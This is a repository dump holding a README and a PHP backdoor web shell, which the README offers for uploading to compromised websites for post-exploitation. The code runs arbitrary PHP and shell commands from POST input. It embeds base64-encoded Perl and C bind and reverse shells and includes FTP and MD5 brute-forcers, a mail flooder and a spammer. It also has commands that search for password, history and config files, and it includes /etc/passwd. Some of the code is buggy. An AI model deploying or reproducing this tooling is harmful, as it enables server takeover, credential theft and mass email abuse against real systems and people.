├── README.md
└── bheh_shell.php
/README.md:
--------------------------------------------------------------------------------
1 | # bheh_php_shell
2 | Black Hat Ethical Hacking | PHP Backdoor Shell v1.0
3 |
4 | For Educational Purpose Only!
5 |
6 | By SaintDruG // for Black Hat | Ethical Hacking // www.blackhatethicalhacking.com
7 |
8 | A Custom PHP Web Shell, used for penetration testing.
9 |
10 | Purpose: When you gain access to a website, and you have the ability to upload files, uploading this file, and running it will give you a set of tools and capabilities to take over and escalate using post exploitation in a fast timely manner.
11 |
12 | # Screenshot:
13 | 
14 |
15 | # Black Hat Ethical Hacking
16 |
17 | 
18 |
--------------------------------------------------------------------------------
/bheh_shell.php:
--------------------------------------------------------------------------------
1 | alert('Your shell script was succefully deleted!')";
25 | }
26 |
27 |
28 | function md5_brute($hash,$log,$dict)
29 | {
30 | ignore_user_abort(1);
31 | set_time_limit(0);
32 |
33 | $fl = fopen($dict, "r");
34 | $fl = fopen($log, "w");
35 | $count = 0;
36 | if(!$dict){
37 | return "Fill 'dictionary_file' field!";
38 | }if(!$log){
39 | return "Fill 'log_file' field!";
40 | }elseif(!strlen($hash) == 0){
41 | return "Fill 'md5_hash' field!";
42 | }else{
43 | while(!$feof($dict)){
44 | $pass = fgets($dict);
45 | $brute_hash = md5($pass);
46 | if($brute_hash == $hash){
47 | fputs($log, "$hash:$pass\n---");
48 | fclose($dict);
49 | fclose($log);
50 | exit;
51 | }else{
52 | $count = $count + 1;
53 | fputs($log, "$count passwords was bruted...");
54 | }
55 | }
56 | fputs($log, "$count passwords are failed!");
57 | }
58 | fclose($dict);
59 | fclose($log);
60 | }
61 |
62 | function port_bind($port,$pass,$method)
63 | {
64 | $perl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
65 | VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
66 | JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
67 | TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
68 | lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
69 | Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
70 | Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
71 | lIENPTk47DQpleGl0IDA7DQp9DQp9";
72 | $c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
73 | A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
74 | GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
75 | b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
76 | pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
77 | NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
78 | ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
79 | ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
80 | 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
81 | 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
82 | 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
83 | dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
84 | lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
85 |
86 | if($method=='Perl')
87 | {
88 | fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
89 | fclose($i);
90 | ex(which("perl")." /tmp/shlbck ".$port." &");
91 | unlink("/tmp/shlbck");
92 | return ex('ps -aux | grep shlbck');
93 | }
94 | elseif($method=='C#')
95 | {
96 | fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
97 | fclose($i);
98 | ex("gcc shlbck.c -o shlbck");
99 | unlink('shlbck.c');
100 | ex("/tmp/shlbck ".$port." ".$pass." &");
101 | unlink("/tmp/shlbck");
102 | return ex('ps -aux | grep shlbck');
103 | }else
104 | {
105 | return 'Choose method';
106 | }
107 |
108 | }
109 |
110 | function backconnect($ip,$port,$method)
111 | {
112 | $perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
113 | aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
114 | hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
115 | sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
116 | kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
117 | KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
118 | OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
119 |
120 | $c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
121 | BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
122 | SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
123 | KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
124 | sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
125 | Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
126 | QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
127 | Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
128 |
129 | if($method=='Perl')
130 | {
131 | fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl));
132 | fclose($i);
133 | ex(which("perl")." /tmp/shlbck ".$ip." ".$port." &");
134 | unlink("/tmp/shlbck");
135 | return ex('netstat -an | grep -i listen');
136 | }
137 | elseif($method=='C#')
138 | {
139 | fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c));
140 | fclose($i);
141 | ex("gcc shlbck.c -o shlbck");
142 | unlink('shlbck.c');
143 | ex("/tmp/shlbck ".$ip." ".$port." &");
144 | unlink("/tmp/shlbck");
145 | return ex('netstat -an | grep -i listen');
146 | }else
147 | {
148 | return 'Choose method';
149 | }
150 | }
151 |
152 | if($_POST['type']==11){download(stripslashes($_POST['value']));};
153 |
154 | function download($dfilename)
155 | {
156 | $file=fopen($dfilename,"r");
157 | ob_clean();
158 | $filename = basename($dfilename);
159 | $filedump = fread($file,@filesize($dfilename));
160 | fclose($file);
161 | header("Content-type: ".$mime_type);
162 | header("Content-disposition: attachment; filename=\"".$filename."\";");
163 | echo $filedump;
164 | }
165 |
166 | function flooder($logf,$to,$from,$subject,$msg,$amount,$check)
167 | {
168 | ignore_user_abort(1);
169 | set_time_limit(0);
170 |
171 | $fl = fopen($logf, "w");
172 | $count = 0;
173 | if(!$logf){
174 | return "Fill 'log_file' field!";
175 | }elseif(!$to){
176 | return "Fill 'Send to' field!";
177 | }elseif(!$from){
178 | return "Fill 'From' field!";
179 | }elseif(!$subject){
180 | return "Fill 'Subject' field!";
181 | }elseif(!$msg){
182 | return "Fill 'Message' field!";
183 | }elseif(!$amount){
184 | return "Fill 'Amount' field!";
185 | }else{
186 | while($count < $amount){
187 | mail("$to", "$subject", "$msg", "From: $from");
188 | $count = $count + 1;
189 | $fl = fopen($logf, "w");
190 | fputs($fl, "$count flood-letters was sended...");
191 | fclose($fl);
192 | }
193 | if(strlen($check) != 0){
194 | $check_text = "Done! $count flood-letters was sended!";
195 | $check_sub = 'Check';
196 | mail("$check", "$check_sub", "$check_text", "From: $from");
197 | $fl = fopen($logf, "w");
198 | fputs($fl, "Done! $count flood-letters was sended!");
199 | }
200 | else{
201 | $fl = fopen($logf, "w");
202 | fputs($fl, "Done! $count flood-letters was sended!");
203 | }
204 | }
205 | fclose($fl);
206 | }
207 |
208 | function ftp_brute($host,$ftp_users,$ftp_passwd,$ftp_log)
209 | {
210 | ignore_user_abort(1);
211 | set_time_limit(0);
212 |
213 | $fl = fopen($ftp_users, "r");
214 | $fd = fopen($ftp_passwd, "r");
215 | $fr = fopen($ftp_log, "a+");
216 | if(!$host){
217 | return "Fill 'Host' field!";
218 | }elseif(!$ftp_users){
219 | return "Fill 'ftp_users file' field!";
220 | }elseif(!$ftp_passwd){
221 | return "Fill 'ftp_passwd file' field!";
222 | }elseif(!$ftp_log){
223 | return "Fill 'ftp_log file' field!";
224 | }elseif(!file_exists($ftp_users)){
225 | return "File ".$ftp_users." doesn't exists!";
226 | }elseif(!file_exists($ftp_passwd)){
227 | return "File ".$ftp_passwd." doesn't exists!";
228 | }
229 | else{
230 | while(!feof($fd)){
231 | $pass = fgets($fd);
232 | while(!feof($fl)){
233 | $user = fgets($fl);
234 | $connect = ftp_connect($host);
235 | if(!$connect){
236 | fputs($fr, "Enable connect to $host\n");
237 | exit;
238 | }else{
239 | $auth = ftp_login($connect, $user, $pass);
240 | if(!$auth){
241 | ftp_quit($connect);
242 | }
243 | else{
244 | fputs($fr, "$host:\n---$login:$pass\n---");
245 | ftp_quit($connect);
246 | }
247 | }
248 | }
249 | }
250 | fputs($fr, "Done:\n");
251 | fclose($fr);
252 | }
253 | fclose($fl);
254 | fclose($fd);
255 | }
256 |
257 | function spammer($from,$subject,$msg,$check,$elist,$logf)
258 | {
259 | ignore_user_abort(1);
260 | set_time_limit(0);
261 |
262 | $fp = fopen($elist. "r");
263 | $fl = fopen($logf, "w");
264 | $count = 0;
265 | if(!$from){
266 | return "Fill 'From' field!";
267 | }elseif(!$elist){
268 | return "Fill 'Emails list' field!";
269 | }elseif(!$logf){
270 | return "Fill 'Log File' field!";
271 | }elseif(!$msg){
272 | return "Fill 'Message' field!";
273 | }elseif(!$subject){
274 | return "Fill 'Subject' field!";
275 | }elseif(!file_exists($elist)){
276 | return "File ".$elist." doesn't exists!";
277 | }else{
278 | while(!feof($fp)){
279 | $to = fgets($fp);
280 | mail("$to", "$subject", "$msg", "From: $from");
281 | $count = $count + 1;
282 | $fl = fopen($logf, "w");
283 | fputs($fl, "$count letters was sent...");
284 | fclose($fl);
285 | }
286 | if(strlen($check) != 0){
287 | $check_text = "Done! $count letters was sent!";
288 | $check_sub = 'Check';
289 | mail("$check", "$check_sub", "$check_text", "From: $from");
290 | $fl = fopen($logf, "w");
291 | fputs($fl, "Done! $count letters was sent!\n");
292 | }
293 | else{
294 | $fl = fopen($logf, "w");
295 | fputs($fl, "Done! $count letters was sent!");
296 | }
297 | }
298 | fclose($fp);
299 | fclose($fl);
300 | }
301 |
302 | function alias($in)
303 | {
304 | if($in=="find apahce config file"){return ex('find / -type f -name httpd.conf');}
305 | elseif($in=="find access_log files"){return ex('find / -type f -name access_log');}
306 | elseif($in=="find error_log files"){return ex('find / -type f -name error_log');}
307 | elseif($in=="find suid files"){return ex('find / -type f -perm -04000 -ls');}
308 | elseif($in=="find suid files in current dir"){return ex('find . -type f -perm -04000 -ls');}
309 | elseif($in=="find sgid files"){return ex('find / -type f -perm -02000 -ls');}
310 | elseif($in=="find sgid files in current dir"){return ex('find . -type f -perm -02000 -ls');}
311 | elseif($in=="find config.inc.php files"){return ex('find / -type f -name config.inc.php');}
312 | elseif($in=="find config.inc.php files in current dir"){return ex('find . -type f -name config.inc.php');}
313 | elseif($in=="find config* files"){return ex('find / -type f -name "config*"');}
314 | elseif($in=="find config* files in current dir"){return ex('find . -type f -name "config*"');}
315 | elseif($in=="find all writable files"){return ex('find / -type f -perm -2 -ls');}
316 | elseif($in=="find all writable files in current dir"){return ex('find . -type f -perm -2 -ls');}
317 | elseif($in=="find all writable directories"){return ex('find / -type d -perm -2 -ls');}
318 | elseif($in=="find all writable directories in current dir"){return ex('find . -type d -perm -2 -ls');}
319 | elseif($in=="find all writable directories and files"){return ex('find / -perm -2 -ls');}
320 | elseif($in=="find all writable directories and files in current dir"){return ex('find . -perm -2 -ls');}
321 | elseif($in=="find all service.pwd files"){return ex('find / -type f -name service.pwd');}
322 | elseif($in=="find service.pwd files in current dir"){return ex('find . -type f -name service.pwd');}
323 | elseif($in=="find all .htpasswd files"){return ex('find / -type f -name .htpasswd');}
324 | elseif($in=="find .htpasswd files in current dir"){return ex('find . -type f -name .htpasswd');}
325 | elseif($in=="find all .bash_history files"){return ex('find / -type f -name .bash_history');}
326 | elseif($in=="find .bash_history files in current dir"){return ex('find . -type f -name .bash_history');}
327 | elseif($in=="find all .mysql_history files"){return ex('find / -type f -name .mysql_history');}
328 | elseif($in=="find .mysql_history files in current dir"){return ex('find . -type f -name .mysql_history');}
329 | elseif($in=="find all .fetchmailrc files"){return ex('find / -type f -name .fetchmailrc');}
330 | elseif($in=="find .fetchmailrc files in current dir"){return ex('find . -type f -name .fetchmailrc');}
331 | elseif($in=="list file attributes on a Linux second extended file system"){return ex('lsattr -va');}
332 | elseif($in=="show opened ports"){return ex('netstat -an | grep -i listen');}
333 | elseif($in=="---------------------------------------------------------------------------------------------------------"){return ex('ls -la');}
334 | }
335 |
336 | function testperl()
337 | {
338 | if(ex('perl -h'))
339 | {
340 | return "ON";
341 | }else{
342 | return "OFF";
343 | }
344 | }
345 |
346 | function testlynx()
347 | {
348 | if(ex('lynx --help'))
349 | {
350 | return "ON";
351 | }else{
352 | return "OFF";
353 | }
354 | }
355 |
356 |
357 | function view_size($size)
358 | {
359 | if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
360 | elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
361 | elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
362 | else {$size = $size . " B";}
363 | return $size;
364 | }
365 |
366 | function testfetch()
367 | {
368 | if(ex('fetch --help'))
369 | {
370 | return "ON";
371 | }else{
372 | return "OFF";
373 | }
374 | }
375 |
376 | function testwget()
377 | {
378 | if(ex('wget --help'))
379 | {
380 | return "ON";
381 | }else{
382 | return "OFF";
383 | }
384 | }
385 |
386 | function oracle()
387 | {
388 | if(function_exists('ocilogon'))
389 | {
390 | return "ON";
391 | }else{
392 | return "OFF";
393 | }
394 | }
395 |
396 | function postgresql()
397 | {
398 | if(function_exists('pg_connect'))
399 | {
400 | return "ON";
401 | }else{
402 | return "OFF";
403 | }
404 | }
405 |
406 | function testmssql()
407 | {
408 | if(function_exists('mssql_connect'))
409 | {
410 | return "ON";
411 | }else{
412 | return "OFF";
413 | }
414 | }
415 | function testcurl()
416 | {
417 | if(function_exists('curl_version'))
418 | {
419 | return "ON";
420 | }else{
421 | return "OFF";
422 | }
423 | }
424 | function testmysql()
425 | {
426 | if(function_exists('mysql_connect'))
427 | {
428 | return "ON";
429 | }else{
430 | return "OFF";
431 | }
432 | }
433 | function safe_mode()
434 | {
435 | if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3)
436 | {
437 | $_SESSION['safe_mode'] = 1;
438 | return "ON";
439 | }else{
440 | $_SESSION['safe_mode'] = 0;
441 | return "OFF";
442 | }
443 | };
444 |
445 | function ex($in)
446 | {
447 | $out = '';
448 |
449 |
450 | if(function_exists('exec'))
451 | {
452 | exec($in,$out);
453 | $out = join("\n",$out);
454 | }
455 | elseif(function_exists('passthru'))
456 | {
457 | ob_start();
458 | passthru($in);
459 | $out = ob_get_contents();
460 | ob_end_clean();
461 | }
462 | elseif(function_exists('system'))
463 | {
464 | ob_start();
465 | system($in);
466 | $out = ob_get_contents();
467 | ob_end_clean();
468 | }
469 | elseif(function_exists('shell_exec'))
470 | {
471 | $out = shell_exec($in);
472 | }
473 | elseif(is_resource($f = popen($in,"r")))
474 | {
475 | $out = "";
476 | while(!@feof($f)) { $out .= fread($f,1024); }
477 | pclose($f);
478 | }
479 | return $out;
480 | }
481 |
482 | function shell()
483 | {
484 | if($_POST['type']==1)
485 | {
486 | eval(stripslashes($_POST['value']));
487 | }
488 | elseif($_POST['type']==2)
489 | {
490 | pwd();
491 | print_r(ex(stripslashes($_POST['value'])));
492 | }
493 | elseif($_POST['type']==3)
494 | {
495 | if($_SESSION['safe_mode'] == 1){
496 | if(($u=safe_ex('ls -la'))!='')
497 | {return $u;}else{return safe_ex('dir');};
498 |
499 | }else{
500 | if(($u=ex('ls -la'))!='')
501 | {return $u;}else{return ex('dir');};
502 | }
503 | }
504 | elseif($_POST['type']==4)
505 | {
506 | if(file_exists(stripslashes($_POST['value'])))
507 | {
508 | if($safe_mode!=1){
509 | echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value']))));
510 | }else{
511 | echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
512 | };
513 | $_SESSION['edit']=1;
514 | $_SESSION['filename'] = $_POST['value'];
515 | }else{
516 | return 'File doesn\'t exists!';
517 | }
518 | }
519 | elseif($_POST['type']==5)
520 | {
521 | fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value']));
522 | }
523 | elseif($_POST['type']==6)
524 | {
525 | $uploaddir = pwd();
526 | if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
527 | move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
528 | }
529 | elseif($_POST['type']==7)
530 | {
531 | echo alias($_POST['value']);
532 | }
533 | elseif($_POST['type']==8)
534 | {
535 | echo spammer(stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['check']),stripslashes($_POST['elist']),stripslashes($_POST['logf']));
536 | }
537 | elseif($_POST['type']==9)
538 | {
539 | echo ftp_brute(stripslashes($_POST['host']),stripslashes($_POST['users']),stripslashes($_POST['passwd']),stripslashes($_POST['log']));
540 | }
541 | elseif($_POST['type']==10)
542 | {
543 | echo flooder(stripslashes($_POST['log']),stripslashes($_POST['to']),stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['amount']),stripslashes($_POST['check']));
544 | }
545 | elseif($_POST['type']==12)
546 | {
547 | echo backconnect(stripslashes($_POST['ip']),stripslashes($_POST['port']),stripslashes($_POST['method']));
548 | }
549 | elseif($_POST['type']==13)
550 | {
551 | echo backconnect(stripslashes($_POST['port']),stripslashes($_POST['pass']),stripslashes($_POST['method']));
552 | }
553 | elseif($_POST['type']==14)
554 | {
555 | echo md5_brute(stripslashes($_POST['hash']),stripslashes($_POST['log']),stripslashes($_POST['dict']));
556 | }
557 |
558 | else
559 | {$u = ex('ls -la');
560 | if($u == ''){return ex('dir');}else{return $u;};
561 | }
562 |
563 | return null;
564 | };
565 |
566 | function edit()
567 | {
568 | if ($_SESSION['edit'] == 1){
569 | $_SESSION['edit']=0;
570 | return "
";};
571 | }
572 |
573 | function getsystem()
574 | {
575 | return php_uname('s')." ".php_uname('r')." ".php_uname('v');
576 | };
577 |
578 | function getserver()
579 | {
580 | return getenv("SERVER_SOFTWARE");
581 | };
582 |
583 |
584 | function getuser()
585 | {
586 | $out = get_current_user();
587 | if($out!="SYSTEM")
588 | {
589 | if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();};
590 | }
591 | return $out;
592 | };
593 |
594 | function pwd()
595 | {
596 | if($_POST['type']==3)
597 | {
598 | $_SESSION['pwd'] = stripslashes($_POST['value']);
599 | }
600 | chdir($_SESSION['pwd']);
601 | $cwd = getcwd();
602 | if($u=strrpos($cwd,'/'))
603 | {
604 | if($u!=strlen($cwd)-1){
605 | return $cwd.'/';}
606 | else{return $cwd;};
607 | }
608 | elseif($u=strrpos($cwd,'\\'))
609 | {
610 | if($u!=strlen($cwd)-1){
611 | return $cwd.'\\';}
612 | else{return $cwd;};
613 | };
614 | }
615 |
616 | function safe_ex($in)
617 | {
618 | if($in){
619 | $d=dir('.');
620 |
621 | while (false!==($file=$d->read()))
622 | {
623 | if ($file=="." || $file=="..") continue;
624 | @clearstatcache();
625 | list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
626 | if(!$unix){
627 | echo date("d.m.Y H:i",$mtime)." ";
628 | if(@is_dir($file)) echo " "; else printf("% 7s ",$size);
629 | }
630 | else{
631 | $owner = @posix_getpwuid($uid);
632 | $grgid = @posix_getgrgid($gid);
633 | echo $inode." ";
634 | echo perms(@fileperms($file));
635 | printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
636 | echo date("d.m.Y H:i ",$mtime);
637 | }
638 | echo "$file\n";
639 | }
640 | $d->close();
641 | }
642 |
643 | function safe_read($in)
644 | {
645 | echo ini_get("safe_mode");
646 | echo ini_get("open_basedir");
647 | include("/etc/passwd");
648 | ini_restore("safe_mode");
649 | ini_restore("open_basedir");
650 | echo ini_get("safe_mode");
651 | echo ini_get("open_basedir");
652 |
653 | file_get_contents($in);
654 | }
655 |
656 | }
657 | ?>
658 |
659 |
660 |
661 |
662 |
663 |
664 |
665 |
666 |
667 |
668 |
669 |
670 | .::Black Hat | Ethical Hacking | Special Webshell | Educational Purpose Only::.
671 |
672 |
680 |
691 |
692 |
693 |
694 |
695 |
696 |
697 |
698 |
699 | System:
700 | |
701 |
702 |
703 | |
704 |
705 | Server:
706 | |
707 |
708 |
709 | |
710 |
711 | User:
712 | |
713 |
714 |
715 | |
716 |
717 | pwd:
718 | |
719 |
720 | 45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?>
721 | |
722 |
723 | |
724 |
725 |
738 |
739 | |
740 |
741 |
742 |
743 |
744 |
745 | PHP-version:
746 | |
747 |
748 | MySQL:
749 | |
750 |
751 | MSSQL:
752 | |
753 |
754 | PostgreSQL:
755 | |
756 |
757 | Oracle:
758 | |
759 |
760 | |
761 |
762 |
763 |
764 | |
765 |
766 |
767 | |
768 |
769 |
770 | |
771 |
772 |
773 | |
774 |
775 |
776 | |
777 |
778 | | |
779 |
780 |
781 | Safe_mode:
782 | |
783 |
784 | cURL:
785 | |
786 |
787 | wget:
788 | |
789 |
790 | fetch:
791 | |
792 |
793 | lynx:
794 | |
795 | |
796 |
797 |
798 |
799 | |
800 |
801 |
802 | |
803 |
804 |
805 | |
806 |
807 |
808 | |
809 |
810 |
811 | |
812 | |
813 | |
814 |
815 |
816 | Perl:
817 | |
818 |
819 | Server time:
820 | |
821 |
822 | Server date:
823 | |
824 |
825 | Total space:
826 | |
827 |
828 | Free space:
829 | |
830 | |
831 |
832 |
833 |
834 | |
835 |
836 |
837 | |
838 |
839 |
840 | |
841 |
842 |
843 | |
844 |
845 |
846 | |
847 | |
848 |
849 | |
850 |
851 | |
852 |
853 |
854 |
855 |
856 |
857 |
862 | |
863 |
864 |
865 |
866 |
867 |
889 | |
890 |
891 |
894 |
895 |
896 | |
908 |
920 | |
921 |
922 | |
934 |
949 | |
950 | |
993 |
1108 |
1109 |
1127 | |
1128 |
1129 |
1130 | | |
1131 |
1132 |
1133 |
1134 | |
1163 |
1164 | | |
1165 |
1166 |
1167 | |
1196 |
1197 | | |
1198 |
1223 | |
1224 | | |
1225 |
1226 |
1359 | |
1360 |
1361 | |
1362 |
1363 | .:[Public v1.0]:.
1364 |
1365 |
1366 |
1367 |
1368 |
1369 |
1370 |
1371 |
1372 |
1373 |
1374 |
1375 |
1376 |
1377 |
1378 |
1379 |
1380 | .::Black Hat | Ethical Hacking | Special Webshell | Educational Purpose Only::.
1381 |
1382 |
1390 |
1401 |
1402 |
1403 |
1404 |
1405 |
1406 |
1407 |
1408 |
1409 | System:
1410 | |
1411 |
1412 | Linux 4.9.26v7-aufs #1 SMP Tue May 9 20:14:03 CEST 2017
1413 | |
1414 |
1415 | Server:
1416 | |
1417 |
1418 | Apache/2.4.29 (Debian)
1419 | |
1420 |
1421 | User:
1422 | |
1423 |
1424 | uid=33(www-data) gid=33(www-data) groups=33(www-data)
1425 | |
1426 |
1427 | pwd:
1428 | |
1429 |
1430 | /var/www/html/
1431 | |
1432 |
1433 | |
1434 |
1435 |
1448 |
1449 | |
1450 |
1451 |
1452 |
1453 |
1454 |
1455 | PHP-version:
1456 | |
1457 |
1458 | MySQL:
1459 | |
1460 |
1461 | MSSQL:
1462 | |
1463 |
1464 | PostgreSQL:
1465 | |
1466 |
1467 | Oracle:
1468 | |
1469 |
1470 | |
1471 |
1472 |
1473 | 7.2.4-1
1474 | |
1475 |
1476 | OFF
1477 | |
1478 |
1479 | OFF
1480 | |
1481 |
1482 | OFF
1483 | |
1484 |
1485 | OFF
1486 | |
1487 |
1488 | | |
1489 |
1490 |
1491 | Safe_mode:
1492 | |
1493 |
1494 | cURL:
1495 | |
1496 |
1497 | wget:
1498 | |
1499 |
1500 | fetch:
1501 | |
1502 |
1503 | lynx:
1504 | |
1505 | |
1506 |
1507 |
1508 | OFF
1509 | |
1510 |
1511 | OFF
1512 | |
1513 |
1514 | ON
1515 | |
1516 |
1517 | OFF
1518 | |
1519 |
1520 | OFF
1521 | |
1522 | |
1523 | |
1524 |
1525 |
1526 | Perl:
1527 | |
1528 |
1529 | Server time:
1530 | |
1531 |
1532 | Server date:
1533 | |
1534 |
1535 | Total space:
1536 | |
1537 |
1538 | Free space:
1539 | |
1540 | |
1541 |
1542 |
1543 | ON
1544 | |
1545 |
1546 | 02:09
1547 | |
1548 |
